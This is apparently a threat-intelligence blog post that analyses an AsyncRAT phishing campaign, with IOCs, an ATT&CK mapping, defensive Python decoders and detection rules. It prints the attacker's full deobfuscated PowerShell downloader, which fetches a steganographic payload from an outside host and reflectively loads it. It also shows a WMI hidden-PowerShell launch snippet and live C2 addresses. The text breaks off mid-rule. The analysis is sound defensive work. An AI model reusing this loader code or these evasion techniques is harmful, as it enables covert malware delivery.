Phishing (medium)
Investigated: March 16, 2026 | Published: March 16, 2026

HackForums Actor "gigajew" Caught Red-Handed: AsyncRAT Campaign Uses Cloudinary CDN Steganography and 7-Month-Old Bulletproof Infrastructure

#phishing #asyncrat #c2 #apt #spearphishing

TL;DR

A four-stage AsyncRAT campaign abuses Cloudinary's image CDN to hide a .NET loader inside a JPEG, then drops a full-featured RAT from a bulletproof Windows VPS in Amsterdam. The developer left their HackForums username -- gigajew -- compiled directly into the loader's .NET namespace. The same C2 IP was running German parcel phishing seven months ago, proving sustained criminal infrastructure reuse that most threat feeds have missed entirely.


Why This Matters

Most crimeware investigations end at "it's AsyncRAT" and a list of hashes. This one goes further because the operator made three critical mistakes that expose the entire operation:

  1. Direct attribution baked into the binary. The Stage 2 .NET loader assembly contains the namespace HackForums.gigajew.x64. That is not a generic builder artifact. That is a developer's forum handle, compiled into every sample they distribute. Every downstream operator running this loader is carrying the author's fingerprint.

  2. CDN steganography for payload staging. The campaign hides a 1.1 MB .NET assembly inside a fake JPEG hosted on Cloudinary (account dn6bpc2yo). Cloudinary is a legitimate, widely trusted image CDN. Most corporate proxies, firewalls, and even EDR products will not flag HTTPS downloads from res.cloudinary.com. This is not novel, but it remains devastatingly effective.

  3. Seven months of infrastructure reuse on one IP. The C2 server at 91[.]92[.]242[.]219 was hosting a Hermes (German parcel delivery) phishing page under the domain online-renew[.]one back in August 2024. That same IP now serves AsyncRAT payloads. Same server, same bulletproof host, different campaign. The actor is comfortable and has not been disrupted.

This post walks through the full four-stage infection chain, the malware's capabilities, the infrastructure behind it, and what defenders need to do about it right now.


The Lure: A JScript File Pretending to Be a PDF

The campaign begins with a spearphishing email carrying a file named:

met-tech_pricing_request_product_specifications_drawings_031620260000000_pdf.js

The filename is carefully crafted. It references "met-tech pricing request" and "product specifications" -- language targeting manufacturing, engineering, or procurement teams. The _pdf suffix before .js is a classic double-extension trick designed to fool users who have file extensions hidden in Windows Explorer. They see a long filename ending in "pdf" and assume it is a document.

It is not a document. It is a 32 KB JScript file that executes the moment it is double-clicked.

Sample hashes:

Algorithm | Hash
----------|-----
SHA256    | 57c5c7a34d11c1135ab38c3612030377345685347f49c1b2a626106cbe4385bd
SHA1      | 90c29d32d2390e1ad1a670a5b097c361b73aab22
MD5       | 966d8da6422ee21e23520f869212cd87

Stage 0: JScript Dropper with WMI-Based Execution

The JScript dropper uses two obfuscation layers to slow down analysis:

Junk padding. Approximately 182 lines of dead code at the top and bottom of the file consist of nothing but this.raingear += "Altissimo" repeated endlessly. This is designed to waste the time of anyone scrolling through the file manually and to inflate the file size past quick-scan thresholds.

String splitting with noise tokens. Every meaningful string in the script is broken apart with two delimiter tokens -- "Altissimo" and "ranki" -- inserted between each real character. At runtime, the script calls .split().join() to strip the noise and reassemble the actual strings.

After deobfuscation, the key variables reveal:

Variable       | Deobfuscated Value
---------------|-------------------
louvredService | winmgmts:root\cimv2
louvredStartup | Win32_ProcessStartup
louvredProcess | Win32_Process
insinuateth    | powershell.exe -NoProfile -WindowStyle Hidden -Command "[payload]"

The execution mechanism is notable. Rather than calling WScript.Shell.Run() or ShellExecute -- which most EDR products hook aggressively -- the dropper uses WMI process creation:

// Deobfuscated execution flow
var svc = GetObject("winmgmts:root\\cimv2");
var startup = svc.Get("Win32_ProcessStartup").SpawnInstance_();
startup.ShowWindow = 0;  // Hidden window
svc.Get("Win32_Process").Create(powershellCommand, null, startup);

WMI spawns processes through the WMI Provider Host (WmiPrvSE.exe), not through the standard CreateProcess API. This breaks the expected parent-child process relationship that many detection rules rely on. The PowerShell process appears to be spawned by WmiPrvSE.exe, not by WScript.exe, which can cause alert rules keyed on "script host spawning PowerShell" to miss the event entirely.

The JScript file also contains a 3,022-character hex-encoded payload in the punkie variable, with ranki delimiters between every hex digit pair. After stripping delimiters and decoding, this yields the Stage 1 PowerShell script.
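Both layers are mechanical to undo. As an added example (not the author's tooling and not code from the sample), this Python deobfuscator drops the junk padding, strips the Altissimo/ranki noise tokens from string variables, and decodes the ranki-delimited hex blob; the script it runs on is a constructed fixture that follows the layout described above, using the variable names from the table.

```python
"""Deobfuscation helpers for the Altissimo/ranki JScript dropper pattern."""
import re

NOISE_TOKENS = ("Altissimo", "ranki")   # noise tokens spliced between real characters
JUNK_PREFIX = "this.raingear +="         # dead-code padding line repeated ~182 times
VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')


def strip_noise(obfuscated: str) -> str:
    """Mirror the dropper's .split(token).join('') passes: remove every noise token."""
    cleaned = obfuscated
    for tok in NOISE_TOKENS:
        cleaned = "".join(cleaned.split(tok))
    # Undo the only JScript string escape the recovered values need (\\ -> \).
    return cleaned.replace("\\\\", "\\")


def decode_hex_payload(punkie: str, delimiter: str = "ranki") -> str:
    """Recover the Stage 1 PowerShell text from the delimiter-separated hex blob."""
    hexstr = "".join(punkie.split(delimiter))
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", hexstr):
        raise ValueError("payload is not clean hex after delimiter stripping")
    return bytes.fromhex(hexstr).decode("utf-8")


def junk_line_count(script: str) -> int:
    """How many lines are pure padding; a high ratio is itself a triage signal."""
    return sum(1 for ln in script.splitlines() if ln.strip().startswith(JUNK_PREFIX))


def deobfuscate_script(script: str) -> dict:
    """Return {variable: recovered value}; the 'punkie' hex blob is decoded to text."""
    found = {}
    for ln in script.splitlines():
        if ln.strip().startswith(JUNK_PREFIX):
            continue
        m = VAR_RE.search(ln)
        if not m:
            continue
        name, raw = m.group(1), m.group(2)
        found[name] = decode_hex_payload(raw) if name == "punkie" else strip_noise(raw)
    return found


def _obfuscate_fixture(text: str) -> str:
    """Constructed test fixture only: alternate the two noise tokens between characters
    so the decoder can be exercised offline on the layout the page describes."""
    out = []
    for i, ch in enumerate(text):
        out.append(ch)
        if i < len(text) - 1:
            out.append(NOISE_TOKENS[i % 2])
    return "".join(out)


STAGE1_CMD = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "[payload]"'

# Constructed sample script: padding, three obfuscated variables, more padding.
SAMPLE_SCRIPT = "\n".join(
    ['this.raingear += "Altissimo";'] * 5
    + ['var louvredService = "' + _obfuscate_fixture("winmgmts:root\\\\cimv2") + '";',
       'var louvredProcess = "' + _obfuscate_fixture("Win32_Process") + '";',
       'var punkie = "' + "ranki".join(f"{b:02x}" for b in STAGE1_CMD.encode()) + '";']
    + ['this.raingear += "Altissimo";'] * 5
)

if __name__ == "__main__":
    print("junk lines:", junk_line_count(SAMPLE_SCRIPT))
    for name, value in deobfuscate_script(SAMPLE_SCRIPT).items():
        print(f"{name} = {value}")
```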


Stage 1: PowerShell Downloads a Weaponized JPEG from Cloudinary

The decoded PowerShell payload is where the campaign gets interesting. Here it is in full, deobfuscated:

# Stage 1 -- CDN Steganography Downloader
$url = 'https://res.cloudinary.com/dn6bpc2yo/image/upload/v1773640942/optimized_MSI_eheqzz.jpg'
$wc = New-Object Net.WebClient
$data = $wc.DownloadData($url)
$text = [Text.Encoding]::UTF8.GetString($data)

# Extract payload between steganographic markers
$start = $text.IndexOf('IN-')
$end   = $text.LastIndexOf('-in1')
if ($start -eq -1 -or $end -eq -1) { return }

$encoded = $text.Substring($start + 3, $end - $start - 3)

# Decode: replace '#' with 'A', reverse the string, base64 decode
$chars = $encoded.Replace('#', 'A').ToCharArray()
[Array]::Reverse($chars)
$reversed = $chars -join ''
[byte[]]$assembly = [Convert]::FromBase64String($reversed)

# Reflective load -- no file touches disk
$domain = [AppDomain]::CurrentDomain.Load($assembly)

# Execute Fiber loader with C2 configuration
$args = @(
    'http://91.92.242.219/img_230249.png',   # Stage 3 URL
    '',
    'C:\Users\Public\Downloads\',             # Drop path
    'Name_File',                              # Filename
    'CasPol',                                 # LOLBIN target
    '', 'CasPol', '',
    'URL',                                    # Download mode
    'C:\Users\Public\Downloads\', 'Name_File', 'js',
    '1', '',
    'Task_Name',                              # Sched task name
    '1', '', ''
)
$type   = $domain.GetType('Fiber.Program')
$method = $type.GetMethod('Main')
$method.Invoke($null, [object[]]$args)

Several things stand out here.

Cloudinary as a Payload CDN

The Stage 2 .NET loader is embedded inside a real JPEG image hosted on Cloudinary's CDN (res[.]cloudinary[.]com). Cloudinary is a legitimate SaaS platform used by thousands of websites for image optimization and delivery. Traffic to res.cloudinary.com over HTTPS is:

  • Encrypted (TLS), so content inspection at the proxy is difficult
  • From a trusted, high-reputation domain, so it passes URL filtering
  • On a CDN with valid certificates, so certificate pinning is not an issue
  • Indistinguishable from normal web browsing at the network level

The attacker's Cloudinary account ID is dn6bpc2yo. The carrier image is 2.87 MB, with 1,554,432 characters of encoded payload inserted between IN- and -in1 text markers inside the file. The image itself renders normally -- it looks like a legitimate photo if opened in an image viewer.

The Decoding Algorithm

The encoding scheme is simple but effective:

  1. Extract the text between IN- and -in1 markers
  2. Replace all # characters with A (character substitution to break base64 pattern matching)
  3. Reverse the entire string
  4. Base64 decode the result

This produces a 1,165,824-byte .NET DLL (the Fiber loader), which is loaded directly into memory via [AppDomain]::CurrentDomain.Load(). No file is written to disk at this stage. The loader exists only in process memory, evading file-based scanning entirely.


Stage 2: The Fiber Loader and the HackForums.gigajew Namespace

SHA256: 240068f98bd3e3213351ebdac3a0e9657f9a17506e43425ea3ed19f14e17cf21
MD5: 362a05c05433d060383c4ba383d00839
Size: 1,165,824 bytes (1.1 MB)
Type: PE32 .NET DLL (x86), CLR v4.0.30319

The Attribution Artifact

When the Fiber loader assembly is parsed, the .NET metadata reveals these type definitions:

Namespace: HackForums.gigajew
  Type: HackForums.gigajew.x64

Namespace: Fiber
  Type: Fiber.Program

Namespace: (root)
  Type: VirtualMachineDetector
  Type: BiosCharacteristics

The HackForums.gigajew.x64 type is the smoking gun. This is a compiled .NET namespace, meaning it was defined in the source code's project structure. The developer who built the Fiber loader used HackForums.gigajew as their root namespace -- directly embedding their HackForums handle into every compiled binary they distribute.

This is a common OPSEC failure in the crimeware ecosystem. Developers build tools under their forum identity, distribute them (or sell them), and every customer's deployed sample carries the author's fingerprint. It is the digital equivalent of a burglar leaving a business card at the crime scene.

What the Fiber Loader Does

Based on the arguments passed from Stage 1, Fiber performs the following:

  1. Downloads Stage 3 from hxxp://91[.]92[.]242[.]219/img_230249.png over plain HTTP
  2. Drops the payload to C:\Users\Public\Downloads\
  3. Executes via CasPol.exe, the Code Access Security Policy tool, a legitimate Microsoft .NET Framework binary. Using it to load and execute arbitrary assemblies is a well-documented LOLBIN (Living Off the Land Binary) technique that can bypass application allowlisting policies
  4. Creates a Scheduled Task for persistence (task name is parameterized per deployment)
  5. Sets a Registry Run key (flagRegStartup) as a backup persistence mechanism

Two independent persistence mechanisms ensure the RAT survives reboots even if one method is cleaned.

The loader also bundles Microsoft.Win32.TaskScheduler v2.12 (from the open-source dahall/taskscheduler project) for reliable scheduled task creation across Windows versions.

VM Detection

The VirtualMachineDetector class queries BIOS characteristics via WMI to detect virtualized environments:

  • BIOS_ROM_is_socketed -- physical hardware indicator
  • BIOS_is_Upgradeable_Flash -- flash BIOS check
  • BIOS_Characteristics_Not_Supported -- common in VMs
  • BIOS_shadowing_is_allowed -- hypervisor detection

If the environment appears to be a sandbox or VM, the loader can terminate early, preventing automated analysis from seeing the final payload.


Stage 3: AsyncRAT -- The Final Payload

SHA256: 961c0768778cc40cc684b644fea8b09b1ec373e640ce530659198a5fa4ad099e
MD5: 8c75289cafeabfbbf96d0b338cd7ad76
Size: 56,294 bytes (55 KB)
Type: VB.NET executable (PE32)

The Stage 3 carrier is itself another steganographic JPEG -- a 3840x2160 photograph created with Adobe Photoshop CC 2019 (metadata timestamp 2022-05-05). The RAT payload is appended after the JPEG's FFD9 end-of-image marker as 77,075 bytes of encoded data, delimited by INICIO (start) and FIM (end) markers. These are Portuguese/Spanish words, an interesting linguistic artifact that may indicate the actor's language background or simply reflect code borrowed from a Portuguese-speaking developer's toolkit.

The same decoding algorithm applies: replace # with A, reverse, base64 decode.
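Because the Stage 1 carrier (IN-/-in1 markers) and the Stage 3 carrier (INICIO/FIM markers) share the same four decode steps, one extractor covers both. The following Python is an added example, not the author's tooling: it implements the steps on raw bytes, reports whether the blob sits after the JPEG FFD9 end-of-image marker and whether the decoded payload is a PE, and runs on a constructed stub carrier rather than the real images.

```python
"""Extractor for the carrier-image scheme used at Stage 1 (IN-/-in1) and Stage 3 (INICIO/FIM)."""
import base64

MARKER_SETS = {
    "stage1_fiber": ("IN-", "-in1"),       # Cloudinary JPEG carrying the Fiber loader
    "stage3_asyncrat": ("INICIO", "FIM"),  # img_230249.png carrying AsyncRAT
}
JPEG_EOI = b"\xff\xd9"  # end-of-image marker; the Stage 3 blob is appended after it


def extract_payload(carrier: bytes, start_marker: str, end_marker: str):
    """Apply the decode steps: bytes between markers, '#' -> 'A', reverse, base64.

    Works on raw bytes instead of the loader's lossy UTF-8 string view; the encoded
    region is pure ASCII, so both yield the same result. Returns None when the
    carrier does not hold a well-formed payload.
    """
    start = carrier.find(start_marker.encode())
    end = carrier.rfind(end_marker.encode())  # LastIndexOf, as the PowerShell does
    if start == -1 or end == -1 or end <= start:
        return None
    encoded = carrier[start + len(start_marker):end]
    reversed_b64 = encoded.replace(b"#", b"A")[::-1]
    try:
        return base64.b64decode(reversed_b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError: non-base64 bytes or bad padding
        return None


def classify_carrier(carrier: bytes) -> dict:
    """Triage a suspected carrier: marker set used, whether the blob follows the JPEG
    EOI marker, decoded payload size, and whether the payload is a PE file."""
    for name, (start_marker, end_marker) in MARKER_SETS.items():
        payload = extract_payload(carrier, start_marker, end_marker)
        if payload is None:
            continue
        eoi = carrier.rfind(JPEG_EOI)
        return {
            "marker_set": name,
            "after_eoi": eoi != -1 and carrier.find(start_marker.encode()) > eoi,
            "payload_size": len(payload),
            "is_pe": payload[:2] == b"MZ",
        }
    return {"marker_set": None}


def _build_fixture(marker_set: str, payload: bytes) -> bytes:
    """Constructed test carrier only: a stub JPEG (SOI ... EOI) with the payload appended
    between the markers in the documented encoding (base64, reversed, 'A' -> '#')."""
    start_marker, end_marker = MARKER_SETS[marker_set]
    encoded = base64.b64encode(payload)[::-1].replace(b"A", b"#")
    stub_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + JPEG_EOI
    return stub_jpeg + start_marker.encode() + encoded + end_marker.encode()


# Constructed stand-in for a decoded .NET assembly: MZ header plus a recognisable string.
SAMPLE_PE = b"MZ" + b"\x90" * 64 + b"Fiber.Program\x00"

if __name__ == "__main__":
    for name in MARKER_SETS:
        print(name, classify_carrier(_build_fixture(name, SAMPLE_PE)))
```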

Configuration Keys

The extracted RAT contains the canonical AsyncRAT configuration structure:

Config Key | Purpose
-----------|--------
Host       | C2 server address (encrypted at runtime)
Port       | C2 communication port (encrypted at runtime)
KEY        | AES encryption key for C2 traffic
Sleep      | Beacon/reconnection interval
USBNM      | USB propagation filename
LoggerPath | Keylogger output file path
Mutex      | {236d7778-f364-479f-bacf-8d0c9c30df57}

These fields are unique to the AsyncRAT family and its documented forks (originally from the NYAN-x-CAT/AsyncRAT-C-Sharp project), confirming the family attribution with high confidence.

Capabilities

The RAT is fully featured:

Capability              | Implementation Evidence
------------------------|------------------------
Keylogging              | LowLevelKeyboardProc, WM_KEYDOWN, GetKeyboardLayout, ToUnicodeEx
Active window tracking  | GetActiveWindowTitle, GetForegroundWindow
Screen capture          | Screen, get_PrimaryScreen
Webcam/microphone       | capGetDriverDescriptionA
AES-encrypted C2        | AlgorithmAES, AES_Decryptor, CreateDecryptor, CipherMode
Reverse TCP shell       | BeginConnect, BeginReceive, EndSend
Shell command execution | Shell, ProcessStartInfo, set_UseShellExecute
Anti-sleep/idle         | ES_CONTINUOUS, ES_SYSTEM_REQUIRED
AV detection            | Antivirus class
System reconnaissance   | ComputerInfo, DriveInfo, get_TotalPhysicalMemory, get_UserName
Plugin/module system    | Plugin, Monitoring -- modular extensibility for post-compromise tools
Data compression        | Compress -- likely for exfiltration efficiency
Heartbeat               | ActivatePong, Pong -- connection keepalive

The plugin system is particularly concerning. It means the operator can push additional capability modules to infected hosts after initial compromise -- keylogger upgrades, credential harvesting modules, lateral movement tools -- without deploying a new RAT binary.


The Full Kill Chain

 DELIVERY                    Email attachment (.js masquerading as .pdf)
    |
    v
 STAGE 0 [JScript]          WScript.exe --> WMI Win32_Process.Create()
    |                        --> powershell.exe -NoProfile -WindowStyle Hidden
    v
 STAGE 1 [PowerShell]       HTTPS GET res.cloudinary.com/dn6bpc2yo/...jpg
    |                        Extract between IN- / -in1 markers
    |                        Decode: # -> A, reverse, base64
    |                        Reflective .NET assembly load (fileless)
    v
 STAGE 2 [Fiber Loader]     HTTP GET 91.92.242.219/img_230249.png
    |  (.NET, HackForums     Extract between INICIO / FIM markers
    |   .gigajew namespace)  Same decode algorithm
    |                        Drop to C:\Users\Public\Downloads\
    |                        Execute via CasPol.exe (LOLBIN)
    |                        Persist: Scheduled Task + Registry Run key
    v
 STAGE 3 [AsyncRAT]         AES-encrypted reverse TCP to C2
    |  (VB.NET)              Keylogging, screen capture, webcam
    |                        Plugin system for modular post-compromise
    |                        Heartbeat keepalive (Pong)
    v
 EXFILTRATION               Keystroke logs, screenshots, system info
                             Compressed and AES-encrypted to C2

C2 Infrastructure: Omegatech Bulletproof Hosting

Primary C2: 91[.]92[.]242[.]219

Field              | Value
-------------------|------
IP                 | 91[.]92[.]242[.]219
Location           | Amsterdam, Netherlands
ISP                | Neterra Ltd.
Organization       | Omegatech LTD
ASN                | AS202412
Transit            | AS2914 (NTT America)
WHOIS Registrant   | Omegatech LTD, House of Francis Room 303, Ile du Port, Mahe, Seychelles
Abuse Contact      | abuse@omegatech[.]sc
RIPE Block Created | 2025-09-12
RIPE Org Created   | 2026-01-05
NetBIOS Hostname   | WIN-7N1FIECL6IC
MAC Prefix         | 00:50:56 (VMware)

Exposed services (Shodan, last indexed 2026-03-14):

Port | Service     | Note
-----|-------------|-----
80   | HTTP        | Serves Stage 3 payload
135  | MSRPC       | Microsoft RPC Endpoint Mapper
137  | NetBIOS-NS  | Name Service
139  | NetBIOS-SSN | Session Service
445  | SMB v2      | NTLM authentication enabled
5985 | WinRM       | Windows Remote Management -- exposed to the internet

This is a Windows Server VPS running on VMware infrastructure at a bulletproof hosting provider. The WIN-7N1FIECL6IC hostname is an auto-generated Windows Server name, consistent with a fresh VPS deployment that was never renamed.

The exposed WinRM service (port 5985) is a significant OPSEC failure by the operator. WinRM allows remote PowerShell execution and is a common target for brute-force attacks. Exposing it on a C2 server is an invitation for other actors to compromise the same box.

The open SMB service with NTLM authentication is equally reckless. It leaks the NetBIOS hostname and domain information to anyone who connects.

Omegatech: A Seychelles Shell for Bulletproof Hosting

Omegatech LTD is registered at "House of Francis Room 303, Ile du Port, Mahe, Seychelles" -- a well-known address used by offshore shell companies. The RIPE organization object (ORG-OL329-RIPE) was created in January 2026, and the 91.92.242.0/24 prefix was allocated in September 2025. This is textbook bulletproof hosting infrastructure:

  • Offshore incorporation in a jurisdiction with minimal cooperation on abuse complaints
  • Recently allocated IP space with no historical reputation
  • NTT America (AS2914) as upstream transit -- a major Tier 1 carrier that provides connectivity without content oversight
  • The /24 subnet contains 917 active hosts, suggesting a dense allocation serving multiple criminal operations

Abuse reports to abuse@omegatech[.]sc are unlikely to result in takedown action. This infrastructure will need to be addressed through upstream transit providers or law enforcement channels.

Historical Domain: online-renew[.]one

In August 2024, the domain online-renew[.]one resolved to the same IP address (91[.]92[.]242[.]219) and was serving a Hermes parcel delivery phishing page ("Hermes Paketversand") targeting German-speaking victims. A Let's Encrypt certificate for the domain was issued on 2024-08-07, and the page was captured by urlscan.io (scan ID: ec525365-cc73-4cc5-af58-fa1d93b89db9).

This proves the actor has operated this server for at least seven months, pivoting from phishing to RAT delivery. The infrastructure reuse is a strong clustering indicator -- any other domains or campaigns tied to this IP or this Omegatech allocation are likely operated by the same actor or the same customer of the bulletproof host.

Operational Timeline

Date       | Event
-----------|------
2024-08-07 | Let's Encrypt cert issued for online-renew[.]one; Hermes phishing page live at 91[.]92[.]242[.]219
2025-09-12 | 91.92.242.0/24 RIPE allocation registered to Omegatech
2026-01-05 | Omegatech LTD organization object created in RIPE
2026-01-21 | RIPE records last modified
2026-03-14 | Shodan indexes 91[.]92[.]242[.]219 -- C2 active with ports 80, 135, 139, 445, 5985
2026-03-16 | AsyncRAT sample first seen; uploaded to analysis platforms

Actor Profile: gigajew (HackForums)

Attribution Confidence: HIGH

The HackForums.gigajew namespace is compiled into the .NET assembly. This is not a runtime artifact, a comment, or a metadata field that could be spoofed without access to the source code. It is a namespace declaration in the original C# project, meaning the developer's build environment had this as the project root namespace. To change it, you would need to modify the source code and recompile.

Attribute      | Assessment
---------------|-----------
Platform       | HackForums (underground crimeware forum)
Handle         | gigajew
Product        | "Fiber" loader (.NET, reflective loading, LOLBIN execution, dual persistence)
Infrastructure | Omegatech bulletproof hosting (Seychelles entity, NL IP space, AS202412)
Campaigns      | German parcel phishing (2024), AsyncRAT delivery (2026)
Targeting      | Manufacturing/engineering sector (based on lure content)
Language clues | Portuguese/Spanish markers (INICIO/FIM) in Stage 3 encoding -- possibly borrowed code

OPSEC Failures

  1. Forum handle in compiled namespace -- the single most damaging mistake. Every sample distributed with the Fiber loader carries the author's identity.
  2. Seven months of IP reuse -- the same VPS has served phishing and RAT payloads since August 2024 without rotation.
  3. WinRM exposed to the internet -- port 5985 open on the C2 server invites third-party compromise.
  4. Plain HTTP for Stage 3 delivery -- hxxp://91[.]92[.]242[.]219/img_230249.png is unencrypted, making payload downloads visible in any proxy or network monitoring log.
  5. Single Cloudinary account reuse -- the dn6bpc2yo account ID enables clustering of all samples that pull from the same CDN bucket.

MITRE ATT&CK Mapping

Tactic              | Technique                            | ID        | Stage
--------------------|--------------------------------------|-----------|------
Initial Access      | Spearphishing Attachment             | T1566.001 | Delivery
Defense Evasion     | Masquerading: Double File Extension  | T1036.007 | Stage 0
Execution           | JScript/VBScript Interpreter         | T1059.005 | Stage 0
Execution           | Windows Management Instrumentation   | T1047     | Stage 0
Execution           | PowerShell                           | T1059.001 | Stage 1
Defense Evasion     | Obfuscated Files or Information      | T1027     | Stages 0-3
Defense Evasion     | Steganography                        | T1027.003 | Stages 1-3
Defense Evasion     | Deobfuscate/Decode Files             | T1140     | Stages 1-3
Command and Control | Web Service                          | T1102     | Stage 1
Command and Control | Ingress Tool Transfer                | T1105     | Stages 1-2
Defense Evasion     | Signed Binary Proxy Execution        | T1218     | Stage 2
Persistence         | Scheduled Task                       | T1053.005 | Stage 2
Persistence         | Registry Run Keys                    | T1547.001 | Stage 2
Defense Evasion     | Virtualization/Sandbox Evasion       | T1497.001 | Stage 2
Discovery           | Security Software Discovery          | T1518.001 | Stage 3
Collection          | Keylogging                           | T1056.001 | Stage 3
Collection          | Screen Capture                       | T1113     | Stage 3
Collection          | Video Capture                        | T1125     | Stage 3
Discovery           | System Information Discovery         | T1082     | Stage 3
Command and Control | Encrypted Channel: AES               | T1573.001 | Stage 3

Complete IOC Table

File Indicators

SHA256                                                           | MD5                              | Description
-----------------------------------------------------------------|----------------------------------|------------
57c5c7a34d11c1135ab38c3612030377345685347f49c1b2a626106cbe4385bd | 966d8da6422ee21e23520f869212cd87 | Stage 0 -- JScript dropper
240068f98bd3e3213351ebdac3a0e9657f9a17506e43425ea3ed19f14e17cf21 | 362a05c05433d060383c4ba383d00839 | Stage 2 -- Fiber .NET loader (HackForums.gigajew)
961c0768778cc40cc684b644fea8b09b1ec373e640ce530659198a5fa4ad099e | 8c75289cafeabfbbf96d0b338cd7ad76 | Stage 3 -- AsyncRAT variant (VB.NET)

Network Indicators

Type        | Indicator                                                                                  | Context
------------|--------------------------------------------------------------------------------------------|--------
IP          | 91[.]92[.]242[.]219                                                                        | Primary C2 and Stage 3 payload server
URL         | hxxp://91[.]92[.]242[.]219/img_230249.png                                                  | Stage 3 steganographic payload
URL         | hxxps://res[.]cloudinary[.]com/dn6bpc2yo/image/upload/v1773640942/optimized_MSI_eheqzz.jpg | Stage 2 CDN-hosted steganographic payload
Domain      | online-renew[.]one                                                                         | Historical domain on same C2 IP (Hermes phishing, Aug 2024)
CDN Account | dn6bpc2yo                                                                                  | Cloudinary account used for payload staging
ASN         | AS202412                                                                                   | Omegatech LTD bulletproof hosting

Host-Based Indicators

Type           | Indicator                              | Context
---------------|----------------------------------------|--------
Mutex          | {236d7778-f364-479f-bacf-8d0c9c30df57} | AsyncRAT single-instance mutex
File Path      | C:\Users\Public\Downloads\             | Stage 3 drop directory
LOLBIN         | CasPol.exe                             | Used for Stage 3 execution
.NET Namespace | HackForums.gigajew                     | Attribution artifact in Fiber loader
.NET Class     | Fiber.Program                          | Loader entrypoint
Persistence    | Scheduled Task (parameterized name)    | Persistence mechanism 1
Persistence    | Registry Run key (flagRegStartup)      | Persistence mechanism 2
NetBIOS        | WIN-7N1FIECL6IC                        | C2 server hostname

Detection Guidance

Immediate Blocklist Actions

  • Block 91[.]92[.]242[.]219 at your perimeter firewall, DNS sinkhole, and EDR network policy
  • Add the Cloudinary account dn6bpc2yo to your proxy/CASB monitoring. If your proxy supports URL path inspection, alert on any traffic to res[.]cloudinary[.]com/dn6bpc2yo/
  • Hunt for the mutex {236d7778-f364-479f-bacf-8d0c9c30df57} across all endpoints using your EDR's live query capability
  • Search for files recently created in C:\Users\Public\Downloads\ by CasPol.exe

Process-Based Detection Rules

These behavioral detections will catch this campaign and similar attack chains:

  1. WScript/CScript spawning PowerShell with -WindowStyle Hidden -- this is almost never legitimate
  2. WMI Win32_Process.Create() calls originating from script host processes -- WMI execution from JScript/VBScript is a strong malware signal
  3. CasPol.exe spawning child processes or loading non-Microsoft assemblies -- CasPol has no legitimate reason to execute arbitrary code in modern environments
  4. Scheduled task creation from PowerShell or WMI -- especially with tasks pointing to C:\Users\Public\
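As an added example (not the author's rules), the four detections above expressed as Python and run over constructed process-creation, image-load and task-creation records. The field names and sample events are assumptions modelled loosely on Sysmon telemetry; the WmiPrvSE.exe parent case from Stage 0 is included because a rule keyed only on WScript.exe as the parent would miss this chain.

```python
"""Behavioral triage of endpoint telemetry against the process-based detections above."""
import re

HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
MICROSOFT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Return the names of the detections one event triggers.

    Event shapes (assumed for this example, loosely modelled on Sysmon fields):
      process     : parent, image, cmdline
      image_load  : image, loaded
      task_create : creator, action
    """
    hits = []
    kind = ev.get("kind")
    if kind == "process":
        parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev["cmdline"]
        hidden_ps = image in POWERSHELL and HIDDEN_FLAG.search(cmd) is not None
        # Rule 1: script host launching hidden PowerShell.
        if parent in SCRIPT_HOSTS and hidden_ps:
            hits.append("script_host_spawns_hidden_powershell")
        # Rule 2: WMI Win32_Process.Create re-parents the child under WmiPrvSE.exe,
        # so the parent is not the script host at all.
        if parent == "wmiprvse.exe" and hidden_ps:
            hits.append("wmiprvse_spawns_hidden_powershell")
        # Rule 3a: CasPol.exe has no reason to spawn children.
        if parent == "caspol.exe":
            hits.append("caspol_spawns_child")
    elif kind == "image_load":
        # Rule 3b: CasPol.exe loading an assembly from outside Microsoft directories.
        loaded = ev["loaded"].lower()
        if _base(ev["image"]) == "caspol.exe" and not loaded.startswith(MICROSOFT_DIRS):
            hits.append("caspol_loads_non_microsoft_assembly")
    elif kind == "task_create":
        # Rule 4: task created from PowerShell or WMI, worse when it runs from C:\Users\Public.
        if _base(ev["creator"]) in POWERSHELL | {"wmiprvse.exe"}:
            hits.append("scheduled_task_from_powershell_or_wmi")
            if ev["action"].lower().startswith("c:\\users\\public\\"):
                hits.append("scheduled_task_points_to_public_dir")
    return hits


def triage(events: list) -> list:
    """(index, hits) for every event that matched at least one detection."""
    return [(i, h) for i, ev in enumerate(events) if (h := evaluate(ev))]


# Constructed sample telemetry: the Stage 0-2 chain plus two benign events.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
HIDDEN_CMD = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "[payload]"'
SAMPLE_EVENTS = [
    {"kind": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": PS_EXE, "cmdline": HIDDEN_CMD},
    {"kind": "process", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": PS_EXE, "cmdline": HIDDEN_CMD},
    {"kind": "image_load", "image": CASPOL,
     "loaded": r"C:\Users\Public\Downloads\Name_File"},   # drop path from the Stage 1 arguments
    {"kind": "process", "parent": CASPOL,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ver"},
    {"kind": "task_create", "creator": PS_EXE,
     "action": r"C:\Users\Public\Downloads\Name_File"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": PS_EXE, "cmdline": "powershell.exe -NoProfile"},   # benign interactive shell
    {"kind": "task_create", "creator": r"C:\Windows\explorer.exe",
     "action": r"C:\Program Files\Vendor\updater.exe"},           # benign installer task
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, ", ".join(hits))
```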

Suricata Rules

alert http $HOME_NET any -> $EXTERNAL_NET any (
